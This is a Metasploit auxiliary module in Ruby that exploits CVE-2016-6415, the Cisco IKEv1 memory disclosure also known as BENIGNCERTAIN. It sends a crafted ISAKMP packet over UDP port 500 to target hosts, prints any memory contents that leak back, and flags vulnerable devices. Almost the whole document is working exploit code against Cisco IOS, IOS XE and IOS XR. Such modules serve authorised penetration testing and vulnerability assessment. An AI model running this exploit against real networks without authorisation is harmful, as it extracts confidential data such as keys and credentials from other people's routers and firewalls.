1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Auxiliary::Scanner
8
  include Msf::Auxiliary::Report
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Cisco IKE Information Disclosure',
15
        'Description' => %q{
16
          A vulnerability in Internet Key Exchange version 1 (IKEv1) packet
17
          processing code in Cisco IOS, Cisco IOS XE, and Cisco IOS XR Software
18
          could allow an unauthenticated, remote attacker to retrieve memory
19
          contents, which could lead to the disclosure of confidential information.
20

21
          The vulnerability is due to insufficient condition checks in the part
22
          of the code that handles IKEv1 security negotiation requests.
23
          An attacker could exploit this vulnerability by sending a crafted IKEv1
24
          packet to an affected device configured to accept IKEv1 security
25
          negotiation requests. A successful exploit could allow the attacker
26
          to retrieve memory contents, which could lead to the disclosure of
27
          confidential information.
28
        },
29
        'Author' => [ 'Nixawk' ],
30
        'License' => MSF_LICENSE,
31
        'References' => [
32
          [ 'CVE', '2016-6415' ],
33
          [ 'URL', 'https://github.com/adamcaudill/EquationGroupLeak/tree/master/Firewall/TOOLS/BenignCertain/benigncertain-v1110' ],
34
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160916-ikev1' ],
35
          [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2016-6415' ],
36
          [ 'URL', 'https://musalbas.com/2016/08/18/equation-group-benigncertain.html' ]
37
        ],
38
        'Notes' => {
39
          'AKA' => ['BENIGNCERTAIN'],
40
          'Stability' => UNKNOWN_STABILITY,
41
          'Reliability' => UNKNOWN_RELIABILITY,
42
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
43
        },
44
        'DisclosureDate' => '2016-09-29'
45
      )
46
    )
47

48
    register_options(
49
      [
50
        Opt::RPORT(500),
51
        OptPath.new('PACKETFILE',
52
                    [ true, 'The ISAKMP packet file', File.join(Msf::Config.data_directory, 'exploits', 'cve-2016-6415', 'sendpacket.raw') ])
53
      ]
54
    )
55
  end
56

57
  def run_host(ip)
58
    begin
59
      isakmp_pkt = File.read(datastore['PACKETFILE'])
60
      peer = "#{ip}:#{datastore['RPORT']}"
61

62
      udp_sock = Rex::Socket::Udp.create(
63
        {
64
          'Context' => { 'Msf' => framework, 'MsfExploit' => self }
65
        }
66
      )
67

68
      add_socket(udp_sock)
69

70
      udp_sock.sendto(isakmp_pkt, ip, datastore['RPORT'].to_i)
71
      res = udp_sock.get(3)
72
      return unless res && res.length > 36 # ISAKMP + 36 -> Notitication Data...
73

74
      # Convert non-printable characters to periods
75
      printable_data = res.gsub(/[^[:print:]]/, '.')
76

77
      # Show abbreviated data
78
      vprint_status("Printable info leaked:\n#{printable_data}")
79

80
      chars = res.unpack('C*')
81
      len = (chars[30].to_s(16) + chars[31].to_s(16)).hex
82

83
      return if len <= 0
84

85
      print_good("#{peer} - IKE response with leak")
86
      report_vuln({
87
        :host => ip,
88
        :port => datastore['RPORT'],
89
        :proto => 'udp',
90
        :name => self.name,
91
        :refs => self.references,
92
        :info => "Vulnerable to Cisco IKE Information Disclosure"
93
      })
94

95
      # NETWORK may return the same packet data.
96
      return if res.length < 2500
97

98
      pkt_md5 = ::Rex::Text.md5(isakmp_pkt[isakmp_pkt.length - 2500, isakmp_pkt.length])
99
      res_md5 = ::Rex::Text.md5(res[res.length - 2500, res.length])
100

101
      print_warning("#{peer} - IKE response is same to payload data") if pkt_md5 == res_md5
102
    rescue
103
    ensure
104
      udp_sock.close
105
    end
106
  end
107
end
108

109